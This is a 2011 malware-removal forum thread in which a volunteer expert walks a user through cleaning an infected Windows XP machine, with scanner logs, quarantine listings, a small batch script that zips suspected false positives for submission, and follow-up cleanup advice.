2011-06-13 05:00 . 2011-06-13 05:39 636409 ----a-w- c:\@malware\6-13 malware.docx
2011-06-12 12:56 . 2011-06-12 12:53 2204 ----a-w- c:\@malware\SystemLook.txt
2011-06-12 12:56 . 2011-06-12 12:47 75264 ----a-w- c:\@malware\SystemLook.exe
2011-06-12 12:49 . 2011-06-12 12:59 24438 ----a-w- c:\@malware\6-12 b malware.docx
2011-06-12 06:31 . 2011-06-12 06:30 1419 ----a-w- c:\@malware\aswMBR.txt
2011-06-12 06:31 . 2011-06-12 06:30 512 ----a-w- c:\@malware\MBR.dat
2011-06-12 06:27 . 2011-06-12 06:08 420691 ----a-w- c:\@malware\VPPClean.exe
2011-06-12 06:27 . 2011-06-12 06:50 36713 ----a-w- c:\@malware\6-12 malware.docx
2011-06-12 06:27 . 2011-06-12 06:09 139264 ----a-w- c:\@malware\RKUnhookerLE.EXE
2011-06-12 06:27 . 2011-06-12 06:08 581120 ----a-w- c:\@malware\aswMBR.exe
2011-06-09 13:33 . 2011-06-09 13:38 1511 ----a-w- c:\@malware\malware.txt
2011-06-09 12:56 . 2011-06-09 12:56 12146 ----a-w- c:\@malware\report.txt
2011-06-08 19:55 . 2011-06-08 19:55 29275 ----a-w- c:\@malware\1attach.txt
2011-06-08 19:53 . 2011-06-08 19:53 9727 ----a-w- c:\@malware\1dds.txt
2011-06-08 19:50 . 2011-06-08 19:50 607222 ----a-r- c:\@malware\dds.scr
2011-01-14 22:45 . 2011-01-14 22:45 10252056 ----a-w- c:\@malware\VueMinder_Lite_Setup_8.0.1.exe
2008-08-14 16:55 . 2011-06-13 20:39 39075 ----a-w- c:\@malware\13-6 b malware.docx
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Webbrowser]
"{A1E75A0E-4397-4BA8-BB50-E19FB66890F4}"= "c:\program files\MyAshampoo\tbMyA1.dll" [2010-08-21 2734688]
.
[HKEY_CLASSES_ROOT\clsid\{a1e75a0e-4397-4ba8-bb50-e19fb66890f4}]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"avgnt"="c:\program files\Avira\AntiVir Desktop\avgnt.exe" [2011-03-28 281768]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"HideShutdownScripts"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"NoResolveTrack"= 0 (0x0)
"NoFileAssociate"= 0 (0x0)
.
[hkey_local_machine\software\microsoft\windows\currentversion\explorer\ShellExecuteHooks]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"= "c:\program files\SUPERAntiSpyware\SASSEH.DLL" [2008-05-13 77824]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\!SASWinLogon]
2009-09-03 22:21 548352 ----a-w- c:\program files\SUPERAntiSpyware\SASWINLO.DLL
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"
.
[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Startup^PolderbitS Audio Driver Monitor.lnk]
backup=c:\windows\pss\PolderbitS Audio Driver Monitor.lnkCommon Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\cdloader]
2010-12-03 12:39 50592 ----a-w- c:\documents and settings\admin\Application Data\mjusbsp\cdloader2.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ctfmon.exe]
2008-04-14 09:42 15360 ------w- c:\windows\system32\ctfmon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2010-02-15 23:50 417792 ----a-w- c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SpybotSD TeaTimer]
2009-03-05 20:07 2260480 --sha-w- c:\program files\Spybot - Search & Destroy\TeaTimer.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SUPERAntiSpyware]
2011-05-23 15:00 2424192 ----a-w- c:\program files\SUPERAntiSpyware\SUPERAntiSpyware.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TkBellExe]
2010-10-02 15:51 202256 ----a-w- c:\program files\Common Files\Real\Update_OB\realsched.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"LiveUpdate Notice Service"=3 (0x3)
"LiveUpdate Notice Ex"=3 (0x3)
"LiveUpdate"=3 (0x3)
"Automatic LiveUpdate Scheduler"=2 (0x2)
"AntiVirService"=2 (0x2)
"AntiVirSchedulerService"=2 (0x2)
"wuauserv"=2 (0x2)
"SBAMSvc"=2 (0x2)
"Browser Defender Update Service"=2 (0x2)
"avast! Antivirus"=2 (0x2)
"WMPNetworkSvc"=3 (0x3)
"VSS"=3 (0x3)
"SysmonLog"=3 (0x3)
"ose"=3 (0x3)
"odserv"=3 (0x3)
"nlsX86cc"=2 (0x2)
"idsvc"=3 (0x3)
"gupdatem"=3 (0x3)
"gupdate"=2 (0x2)
"DfSdkS"=3 (0x3)
"Apple Mobile Device"=3 (0x3)
"SBPIMSvc"=2 (0x2)
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring]
"DisableMonitoring"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecFirewall]
"DisableMonitoring"=dword:00000001
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"c:\\WINDOWS\\system32\\sessmgr.exe"=
"c:\\Program Files\\Skype\\Plugin Manager\\skypePM.exe"=
"c:\\Program Files\\Skype\\Phone\\Skype.exe"=
"c:\\mjusbsp\\magicJack.exe"=
"c:\\Program Files\\Parsons\\QuickVerse\\QuickVerse\\qvwin.exe"=
"c:\\Documents and Settings\\admin\\Application Data\\mjusbsp\\magicJack.exe"=
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"5060:UDP"= 5060:UDP:UDP
"5070:UDP"= 5070:UDP:UDP
"49152:UDP"= 49152:UDP:UDP
"65535:UDP"= 65535:UDP:UDP
"443:TCP"= 443:TCP:TCP
.
R1 SASDIFSV;SASDIFSV;c:\program files\SUPERAntiSpyware\sasdifsv.sys [2/17/2010 2:25 PM 12872]
R1 SASKUTIL;SASKUTIL;c:\program files\SUPERAntiSpyware\SASKUTIL.SYS [5/10/2010 2:41 PM 67656]
R2 AntiVirSchedulerService;Avira AntiVir Scheduler;c:\program files\Avira\AntiVir Desktop\sched.exe [6/13/2011 2:11 AM 136360]
R3 CAM1690;USB PC Camera;c:\windows\system32\drivers\cam1690.sys [9/20/2007 6:03 PM 181888]
R3 PbsAuDrv;PolderbitS Audio Driver;c:\windows\system32\drivers\pbsaudrv.sys [8/1/2009 1:17 PM 110752]
R3 RRNetCapMP;RRNetCapMP;c:\windows\system32\drivers\rrnetcap.sys [1/6/2010 4:16 PM 27168]
S2 MBAMService;MBAMService;c:\program files\Malwarebytes' Anti-Malware\mbamservice.exe [9/4/2009 9:59 AM 366640]
S3 ADM8511;ADMtek ADM8511/AN986 USB To Fast Ethernet Converter;c:\windows\system32\drivers\ADM8511.SYS [7/26/2005 6:19 PM 20160]
S3 cpuz130;cpuz130;\??\c:\docume~1\admin\LOCALS~1\Temp\cpuz130\cpuz_x32.sys --> c:\docume~1\admin\LOCALS~1\Temp\cpuz130\cpuz_x32.sys [?]
S3 ionwpvvc;Watchport/V2 USB Camera;c:\windows\system32\drivers\ionwpvvc.sys [2/20/2008 4:50 PM 38656]
S3 MBAMProtector;MBAMProtector;\??\c:\windows\system32\drivers\mbam.sys --> c:\windows\system32\drivers\mbam.sys [?]
S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\mbamswissarmy.sys [9/4/2009 9:59 AM 39984]
S3 nosGetPlusHelper;getPlus(R) Helper 3004;c:\windows\System32\svchost.exe -k nosGetPlusHelper [8/15/2009 12:39 AM 14336]
S3 RRNetCap;RRNetCap Service;c:\windows\system32\drivers\rrnetcap.sys [1/6/2010 4:16 PM 27168]
S4 Compass Server;Compass Server; [x]
S4 DfSdkS;Defragmentation-Service;c:\program files\Ashampoo\Ashampoo WinOptimizer 7\DfSdkS.exe [4/13/2011 1:16 PM 406016]
S4 gupdate;Google Update Service (gupdate);c:\program files\Google\Update\GoogleUpdate.exe [10/19/2010 10:04 AM 136176]
S4 gupdatem;Google Update Service (gupdatem);c:\program files\Google\Update\GoogleUpdate.exe [10/19/2010 10:04 AM 136176]
S4 magicJack;magicJack;c:\mjusbsp\srvany.exe [2/27/2011 5:32 PM 8192]
S4 nlsX86cc;NLS Service;c:\windows\system32\NLSSRV32.EXE --> c:\windows\system32\NLSSRV32.EXE [?]
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - SSMDRV
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
getPlusHelper REG_MULTI_SZ getPlusHelper
nosGetPlusHelper REG_MULTI_SZ nosGetPlusHelper
.
Contents of the 'Scheduled Tasks' folder
.
2011-06-07 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-10-19 14:04]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/
uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
uInternet Connection Wizard,ShellNext = iexplore
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
Trusted Zone: magicjack.com\my
Trusted Zone: talk4free.com\reg
TCP: DhcpNameServer = 192.168.0.1
TCP: Interfaces\{F1AACA3A-E5BE-452E-9F2E-0E4D30CBE236}: NameServer = 67.90.152.122,67.107.71.186
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2011-06-13 17:04
Windows 5.1.2600 Service Pack 3 NTFS
.
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
[HKEY_LOCAL_MACHINE\System\ControlSet009\Services\ASFWHide]
"ImagePath"="\??\c:\docume~1\admin\LOCALS~1\Temp\ASFWHide"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3277941142-1728969546-3919492650-1006\Software\Microsoft\SystemCertificates\AddressBook*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
.
--------------------- DLLs Loaded Under Running Processes ---------------------
.
- - - - - - - > 'winlogon.exe'(924)
c:\program files\SUPERAntiSpyware\SASWINLO.DLL
c:\windows\system32\WININET.dll
.
- - - - - - - > 'explorer.exe'(3636)
c:\windows\system32\WININET.dll
c:\windows\system32\webcheck.dll
c:\windows\system32\IEFRAME.dll
c:\windows\system32\WPDShServiceObj.dll
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
.
------------------------ Other Running Processes ------------------------
.
c:\program files\Avira\AntiVir Desktop\avguard.exe
c:\program files\Avira\AntiVir Desktop\avshadow.exe
.
**************************************************************************
.
Completion time: 2011-06-13 17:16:01 - machine was rebooted
ComboFix-quarantined-files.txt 2011-06-13 21:15
ComboFix2.txt 2011-06-13 06:03
.
Pre-Run: 58,194,358,272 bytes free
Post-Run: 58,117,988,352 bytes free
.
Current=9 Default=9 Failed=8 LastKnownGood=10 Sets=1,2,3,4,5,6,7,8,9,10
- - End Of File - - F40009F5A26D7381F58F365727D08797


ComboFix-quarantined-files.txt

2011-06-13 20:58:06 . 2011-06-13 20:58:06 2,532 ----a-w- C:\Qoobox\Quarantine\Registry_backups\Service_SamSs32.reg.dat
2011-06-13 20:58:06 . 2011-06-13 20:58:06 836 ----a-w- C:\Qoobox\Quarantine\Registry_backups\Legacy_SAMSS32.reg.dat
2011-06-13 20:51:39 . 2011-06-13 20:51:40 1,861,276 ----a-w- C:\Qoobox\Quarantine\[4]-Submit_2011-06-13_16.51.31.zip
2011-06-13 06:02:16 . 2011-06-13 06:02:16 2,092 ----a-w- C:\Qoobox\Quarantine\Registry_backups\AddRemove-ISA_CLV_module.reg.dat
2011-06-13 06:02:04 . 2011-06-13 06:02:04 622 ----a-w- C:\Qoobox\Quarantine\Registry_backups\MSConfigStartUp-SBAMTray.reg.dat
2011-06-13 06:02:04 . 2011-06-13 06:02:04 600 ----a-w- C:\Qoobox\Quarantine\Registry_backups\MSConfigStartUp-ISTray.reg.dat
2011-06-13 06:02:04 . 2011-06-13 06:02:04 656 ----a-w- C:\Qoobox\Quarantine\Registry_backups\MSConfigStartUp-DriverScanner.reg.dat
2011-06-13 06:02:04 . 2011-06-13 06:02:04 584 ----a-w- C:\Qoobox\Quarantine\Registry_backups\MSConfigStartUp-AVG_TRAY.reg.dat
2011-06-13 06:02:04 . 2011-06-13 06:02:04 668 ----a-w- C:\Qoobox\Quarantine\Registry_backups\MSConfigStartUp-Adobe Reader Speed Launcher.reg.dat
2011-06-13 06:02:04 . 2011-06-13 06:02:04 636 ----a-w- C:\Qoobox\Quarantine\Registry_backups\MSConfigStartUp-Adobe ARM.reg.dat
2011-06-13 06:01:55 . 2011-06-13 06:01:55 171 ----a-w- C:\Qoobox\Quarantine\Registry_backups\WebBrowser-{CCC7A320-B3CA-4199-B1A6-9F516DD69829}.reg.dat
2011-06-13 06:01:54 . 2011-06-13 06:01:54 171 ----a-w- C:\Qoobox\Quarantine\Registry_backups\WebBrowser-{D4027C7F-154A-4066-A1AD-4243D8127440}.reg.dat
2011-06-13 06:01:54 . 2011-06-13 06:01:54 213 ----a-w- C:\Qoobox\Quarantine\Registry_backups\Toolbar-{CCC7A320-B3CA-4199-B1A6-9F516DD69829}.reg.dat
2011-06-13 06:01:54 . 2011-06-13 06:01:54 173 ----a-w- C:\Qoobox\Quarantine\Registry_backups\Toolbar-Locked.reg.dat
2011-06-13 06:01:53 . 2011-06-13 06:01:54 376 ----a-w- C:\Qoobox\Quarantine\Registry_backups\BHO-{2045AB79-11EA-4BBF-8735-DBD28E5359Bc}.reg.dat
2011-06-13 06:01:53 . 2011-06-13 06:01:53 421 ----a-w- C:\Qoobox\Quarantine\Registry_backups\BHO-{17CC8F5E-78E0-AD0B-6459-5D135F28F580}.reg.dat
2011-06-13 06:01:53 . 2011-06-13 06:01:53 376 ----a-w- C:\Qoobox\Quarantine\Registry_backups\BHO-{1022D5BC-11EA-4BBF-8735-DBD28E5359Bc}.reg.dat
2011-06-13 05:56:53 . 2011-06-13 20:57:57 7,525 ----a-w- C:\Qoobox\Quarantine\Registry_backups\tcpip.reg
2011-06-13 05:44:34 . 2011-06-13 20:49:54 204 ----a-w- C:\Qoobox\Quarantine\catchme.log
2011-06-10 13:59:03 . 2011-06-10 13:59:03 11 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\LocalService\Application Data\02000000f71535641270S.manifest.vir
2011-06-10 13:59:03 . 2011-06-10 13:59:03 11 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\LocalService\Application Data\02000000f71535641270O.manifest.vir
2011-06-10 13:59:03 . 2011-06-10 13:59:03 13 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\LocalService\Application Data\02000000f71535641270C.manifest.vir
2011-06-10 13:59:03 . 2011-06-10 13:59:14 1,812 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\LocalService\Application Data\02000000f71535641270P.manifest.vir
2011-06-10 13:07:05 . 2011-06-10 13:07:05 0 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\admin\aarexiymqh.tmp.vir
2011-06-10 04:29:21 . 2011-06-10 04:29:10 785,920 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\system32\bad ils32.exe.vir
2011-06-10 04:29:20 . 2011-06-10 04:29:20 168,960 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\system32\bad kbdycl32.dll.vir
2011-06-10 04:29:16 . 2011-06-10 04:29:10 785,920 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\system32\bad dfshim32.exe.vir
2011-06-10 04:29:11 . 2011-06-10 04:29:11 359,424 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\system32\bad ativtmxx32.dll.vir
2011-06-10 04:29:08 . 2011-06-10 04:29:10 785,920 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\admin\0.15188298399276234.exe.vir
2011-04-17 18:34:39 . 2011-04-17 18:34:39 61,485 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\All Users\Application Data\Tarma Installer\{00270290-9BD5-47DB-BAA4-42BE74F16B42}\Setup.dat.vir
2011-04-17 18:34:36 . 2006-08-21 01:59:15 4,846 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\All Users\Application Data\Tarma Installer\{00270290-9BD5-47DB-BAA4-42BE74F16B42}\Setup.ico.vir
2011-04-17 18:34:36 . 2009-02-16 22:23:35 37,888 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\All Users\Application Data\Tarma Installer\{00270290-9BD5-47DB-BAA4-42BE74F16B42}\_Setup.dll.vir
2011-04-17 18:34:36 . 2011-04-17 18:34:30 83,456 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\All Users\Application Data\Tarma Installer\{00270290-9BD5-47DB-BAA4-42BE74F16B42}\Setup.exe.vir
2010-01-13 16:10:15 . 2008-03-28 22:23:28 2,768,896 ----a-w- C:\Qoobox\Quarantine\C\BibleSpeak\BibleSpeak.exe.vir
2009-08-13 14:05:03 . 2009-09-04 14:17:34 4 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\system32\ESQULzxspectrum.vir
2009-04-08 14:17:16 . 2009-04-08 14:17:16 9,229 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\admin\Local Settings\Application Data\{C3DF0D32-A46E-45E1-AB4D-77017415DDFD}\chrome\content\overlay.xul.vir
2009-04-08 14:17:16 . 2009-04-08 14:17:16 770 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\admin\Local Settings\Application Data\{C3DF0D32-A46E-45E1-AB4D-77017415DDFD}\install.rdf.vir
2009-04-08 14:17:16 . 2009-04-08 14:17:16 2,125 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\admin\Local Settings\Application Data\{C3DF0D32-A46E-45E1-AB4D-77017415DDFD}\chrome\content\_cfg.js.vir
2009-04-08 14:17:16 . 2009-04-08 14:17:16 120 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\admin\Local Settings\Application Data\{C3DF0D32-A46E-45E1-AB4D-77017415DDFD}\chrome.manifest.vir
2007-03-23 20:34:42 . 2007-11-22 17:13:24 221,184 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\stic1690.exe.vir
2007-01-07 16:48:01 . 2006-09-21 19:58:16 811,560 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\system32\GoogleToolbarInstaller_en.exe.vir
2006-09-14 07:19:40 . 2006-09-14 07:20:29 481 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\ST6UNST.000.vir
ard
Regular Member
 
Posts: 41
Joined: August 25th, 2009, 7:12 am

Re: redirected searches and email problems

Unread postby melboy » June 13th, 2011, 7:32 pm

Hi

I created the directory c:\@malware to hold the anti-malware exe’s and logs so they wouldn’t be lost to me.
I also added the (bad ) prefix to these files because they kept trying to run in the taskmanager
Nice thinking - well done!
PEV.exe has encountered a problem and must close. etc. etc.etc. send report or don't send
I did nothing.
OK, thanks for letting me know.

I want to check a couple of files I believe may be false positives.

Upload for analysis

Open notepad and copy/paste the text in the codebox below into it:
(Do Not include code:)
Code: Select all
@echo off
for %%g in (
C:\Qoobox\Quarantine\C\BibleSpeak\BibleSpeak.exe.vir
C:\Qoobox\Quarantine\C\WINDOWS\stic1690.exe.vir
) do zip Files_for_submission %%g
del %0 



  • Go to File > Save as... & save this as grab.bat
  • Choose to "Save type as" - "All Files"
  • Save it on your desktop. It should look like this: Image
  • Double click on grab.bat & allow it to run

A file, "Files_for_submission.zip" will be created on your desktop.
Please upload that file here --> http://www.bleepingcomputer.com/submit- ... ?channel=4

  • In the Link to topic where this file was requested: box, copy and paste the following link inside the code box:
    Code: Select all
    http://malwareremoval.com/forum/viewtopic.php?p=582417#p582417
  • Click Browse and browse to the file: Files_for_submission.zip
  • In the Leave any comments, further information about this file, or contact information: box, please copy & paste in:
    Code: Select all
    Requested by melboy. Files for analysis
  • Click Send File
  • Once you see:
Your file was successfully submitted. Please let the user helping you know that you have submitted the file.

Close the site and let me know the upload was successful.



TFC

  • Please download TFC by Old Timer to your desktop,
  • Save any unsaved work. TFC will close all open application windows.
  • Double-click TFC.exe to run the program.
  • Click the Start button in the bottom left of TFC
  • If prompted, click "Yes" to reboot.

Note: Save your work. TFC will automatically close any open programs, let it run uninterrupted. It should not take longer than a couple of minutes , and may only take a few seconds. Only if needed will you be prompted to reboot.



Malwarebytes' Anti-Malware (MBAM)

As you have Malwarebytes' Anti-Malware installed on your computer. Could you please do a scan using these settings:

  • Open Malwarebytes' Anti-Malware
  • Select the Update tab
  • Click Check for Updates
  • After the update have been completed, Select the Scanner tab.
  • Select Perform Quick scan, then click on Scan
  • When done, you will be prompted. Click OK. If Items are found, then click on Show Results
  • Check all items then click on Remove Selected
  • After it has removed the items, Notepad will open. Please post this log in your next reply.

    The log can also be found here:
    1. C:\Documents and Settings\Username\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs\mbam-log-date (time).txt
    2. Or via the Logs tab when the application is started.

Note: MBAM may ask to reboot your computer so it can continue with the removal process, please do so immediately.
Failure to reboot will prevent MBAM from removing all the malware.
User avatar
melboy
MRU Expert
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: redirected searches and email problems

Unread postby ard » June 14th, 2011, 1:10 am

Hi -

step 1 -
I uploaded "Files_for_submission.zip" to.
http://www.bleepingcomputer.com/submit- ... ?channel=4

step 2 -
I ran TFC

step 3 -
I ran MBAM the mbam log file is below


Malwarebytes' Anti-Malware 1.51.0.1200
www.malwarebytes.org

Database version: 6851

Windows 5.1.2600 Service Pack 3
Internet Explorer 8.0.6001.18702

6/14/2011 12:43:22 AM
mbam-log-2011-06-14 (00-43-22).txt

Scan type: Quick scan
Objects scanned: 174312
Time elapsed: 5 minute(s), 40 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 4

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
c:\WINDOWS\system32\02000000f71535641270c.manifest (Malware.Trace) -> Quarantined and deleted successfully.
c:\WINDOWS\system32\02000000f71535641270o.manifest (Malware.Trace) -> Quarantined and deleted successfully.
c:\WINDOWS\system32\02000000f71535641270p.manifest (Malware.Trace) -> Quarantined and deleted successfully.
c:\WINDOWS\system32\02000000f71535641270s.manifest (Malware.Trace) -> Quarantined and deleted successfully.
ard
Regular Member
 
Posts: 41
Joined: August 25th, 2009, 7:12 am

Re: redirected searches and email problems

Unread postby melboy » June 14th, 2011, 1:41 pm

Hi

It's confimed that the two files you uploaded are false positives. One of which was BibleSpeak.exe
C:\BibleSpeak\BibleSpeak.exe

It's good practice to install programs to the %Programfiles% directory (C:\Program Files), rather than install them to the root of the drive (C:\) ;)

We'll restore them in due course - We're nearly finished.

If you're able then, re-install it to the Program Files folder.



Update Java Runtime

You are using an old version of Java. Oracle's Java (Was Sun Java) is sometimes updated in order to eliminate the exploitation of vulnerabilities in an existing version. For this reason, it's extremely important that you keep the program up to date, and also remove the older more vulnerable versions from your system. The most current version of Oracle Java is: Java Runtime Environment Version 6 Update 26.

  • Go to Oracle Java
  • Scroll down to where it says "Java Platform, Standard Edition. Java SE 6 Update 26"
  • Click the Download JRE button to the right.
  • Check the box to Accept License Agreement
  • In the list of files, Look to Windows x86 Offline & click on the link to the right which says "jre-6u26-windows-i586.exe" and save the downloaded file to your desktop.
  • Uninstall all old versions of Java via Start > Control Panel > Add/Remove Programs:
    Java(TM) 6 Update 20
  • Install the new version by running the newly-downloaded file with the java icon which will be at your desktop, and follow the on-screen instructions.
  • Reboot your computer



TFC

You should still have this on your desktop.

  • Save any unsaved work. TFC will close all open application windows.
  • Double-click TFC.exe to run the program.
  • Click the Start button in the bottom left of TFC
  • If prompted, click "Yes" to reboot.

Note: Save your work. TFC will automatically close any open programs, let it run uninterrupted. It should not take longer than a couple of minutes , and may only take a few seconds. Only if needed will you be prompted to reboot.



ESET Online Scanner:

Note: You can use either Internet Explorer or Mozilla FireFox for this scan. You will however need to disable your current installed Anti-Virus, how to do so can be read here.

  • Please go here to run the scan.
    Note: If using Mozilla Firefox you will need to download esetsmartinstaller_enu.exe when prompted then double click on it to install.
    All of the below instructions are compatible with either Internet Explorer or Mozilla FireFox.
  • Select the option YES, I accept the Terms of Use then click on: Image
  • When prompted allow the Add-On/Active X to install.
  • Make sure that the option Remove found threats is NOT checked, and the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Now click on: Image
  • The virus signature database... will begin to download. Be patient this make take some time depending on the speed of your Internet Connection.
  • When completed the Online Scan will begin automatically.
  • Do not touch either the Mouse or keyboard during the scan otherwise it may stall.
  • When completed make sure you first copy the logfile located at C:\Program Files\ESET\EsetOnlineScanner\log.txt
  • Copy and paste that log as a reply to this topic.
  • Now click on: Image (Selecting Uninstall application on close if you so wish)
  • Re-enable your anti-virus software.



Defence Inspector

Please download Defence Inspector and save it to your desktop.

  • Double-click DefenceInspector.exe to run it.
  • When presented with the option to begin the scan, please press any key to continue.
  • When DefenceInspector has finished scanning a log will appear.
  • Please post the contents of this log in your next reply.




In your next reply:
  1. ESET log
  2. DefenceInspector log
User avatar
melboy
MRU Expert
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: redirected searches and email problems

Unread postby ard » June 16th, 2011, 12:00 am

Hi -

step 1
removed old java

step 2
installed new java

step 3
ran eset - log below

step 4
ran DefenceInspector - log below


eset log

C:\Documents and Settings\admin\Local Settings\Application Data\Google\Chrome\User Data\Default\Default\nejcfofponajoeefedoafebpapaplkdm\contentscript.js Win32/TrojanDownloader.Tracur.F trojan
C:\install\registryBooster\registrybooster.exe Win32/RegistryBooster application
C:\Qoobox\Quarantine\[4]-Submit_2011-06-13_16.51.31.zip multiple threats
C:\Qoobox\Quarantine\C\Documents and Settings\admin\0.15188298399276234.exe.vir a variant of Win32/Kryptik.OYY trojan
C:\System Volume Information\_restore{202550A8-7A33-4BCA-9586-051D24DDBF8F}\RP174\A0025682.exe Win32/Toolbar.Zugo application
C:\System Volume Information\_restore{202550A8-7A33-4BCA-9586-051D24DDBF8F}\RP198\A0046630.dll Win32/Toolbar.Zugo application
C:\System Volume Information\_restore{202550A8-7A33-4BCA-9586-051D24DDBF8F}\RP224\A0063082.exe a variant of Win32/Kryptik.OUM trojan
C:\System Volume Information\_restore{202550A8-7A33-4BCA-9586-051D24DDBF8F}\RP226\A0064497.exe a variant of Win32/Kryptik.OYY trojan
C:\System Volume Information\_restore{202550A8-7A33-4BCA-9586-051D24DDBF8F}\RP226\A0064512.sys Win32/Olmasco.E Trojan


Defence Inspector (Version 1.0.1)
Log created at 04:37:39 on June 15, 2011

-= System =-
Windows XP (32-bit, Service Pack 3)
Windows Update: Automatic installation
System Restore: ON (62 restore point(s) available)

-= User Accounts =-
admin (Admin)
Administrator (Admin)
Guest
HelpAssistant (Disabled)
SUPPORT_388945a0 (Disabled)

-= Security Programs =-
Avira AntiVir
Malwarebytes' Anti-Malware
Spybot S&D
SpywareBlaster
SUPERAntiSpyware
WinPatrol
Windows Firewall: Enabled

-= Other Programs =-
Adobe AIR 2.5.1.17730
Google Chrome (Version Unknown)
Internet Explorer 8.0.6001.18702
Java 1.6.0_26

-= EOF =-
ard
Regular Member
 
Posts: 41
Joined: August 25th, 2009, 7:12 am

Re: redirected searches and email problems

Unread postby melboy » June 16th, 2011, 1:19 pm

Hi

Just a little more to do - How are things running?

Some of the ESET findings were expected and will be dealt with in due course (qoobox entries & System Restore)

Again I would point out it is better to install programs to the %ProgramFiles% directory rather than the root of the C: drive. If the folder C:\install holds install/setup files for programs, it might be better to store those files in a folder in "My Documents" rather than the where they are now. ;)

Concerning your e-mail problem. You don't appear to have Adobe Flash installed? Is there any reason why not?


Delete bad folders

Using Windows Explore by right-clicking the start button and left clicking Explore navigate to and find the following folder: if found, delete it.

    Folder:

  • C:\install\registryBooster


Registry Cleaners

Re. registryBooster

I don't personally recommend the use of ANY registry cleaners. Here is an excerpt from a discussion on reg cleaners
Most reg cleaners aren't bad as such, but they aren't perfect and even the best have been known to cause problems. The point we are trying to make is that the risk of using one far outweighs any benefit. If it does work perfectly you will not see any difference. If it doesn't work properly you may end up with an expensive doorstop.

